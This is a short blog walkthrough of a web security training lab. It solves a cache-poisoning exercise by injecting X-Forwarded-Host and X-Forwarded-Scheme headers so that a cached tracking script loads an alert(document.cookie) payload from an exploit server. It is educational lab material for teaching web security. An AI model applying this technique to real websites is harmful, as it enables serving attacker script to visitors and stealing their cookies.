25.3 Lab: Web cache poisoning with multiple headers

This lab contains a web cach e poisoning vulnerability that is only exploitable when you use multiple headers to craft a malicious request. A user visits the home page roughly once a minute. To solve this lab, poison the cache with a response that executes alert(document.cookie) in the visitor’s browser | Karthikeyan Nagaraj

Karthikeyan Nagaraj
2 min readMay 23, 2024

Description

This lab contains a web cache poisoning vulnerability that is only exploitable when you use multiple headers to craft a malicious request. A user visits the home page roughly once a minute. To solve this lab, poison the cache with a response that executes alert(document.cookie) in the visitor's browser.

Solution

  1. With Burp running, load the website’s home page.
  2. Go to “Proxy” > “HTTP history” and study the requests and responses that you generated. Find the GET request for the JavaScript file /resources/js/tracking.js and send it to Burp Repeater.
  3. Add the X-Forwarded-Host: example.com header back to the request, Now add the X-Forwarded-Scheme: nothttps as well. Send this request and notice that the Location header of the 302 redirect now points to https://example.com/.
  4. Go to the exploit server and change the file name to match the path used by the vulnerable response:
    /resources/js/tracking.js
  5. In the body, enter the payload alert(document.cookie) and store the exploit.
  6. Go back to the request in Burp Repeater and set the X-Forwarded-Host header as follows, remembering to enter your own exploit server ID:
    X-Forwarded-Host: YOUR-EXPLOIT-SERVER-ID.exploit-server.net
  7. Make sure the X-Forwarded-Scheme header is set to anything other than HTTPS.
  8. Send the request until you see your exploit server URL reflected in the response and X-Cache: hit in the headers.
  9. To check that the response was cached correctly, right-click on the request in Burp, select “Copy URL”, and load this URL in Burp’s browser. If the cache was successfully poisoned, you will see the script containing your payload, alert(document.cookie). Note that the alert() won't actually execute here.
  10. Go back to Burp Repeater, remove the cache buster, and resend the request until you poison the cache again.
  11. To simulate the victim, reload the home page in the browser and make sure that the alert() fires.
  12. Keep resending the request to keep the cache poisoned until the victim visits the site and the lab is solved.

--

--

Karthikeyan Nagaraj

Security Researcher | Bug Hunter | Web Pentester | CTF Player | TryHackme Top 1% | AI Researcher | Blockchain Developer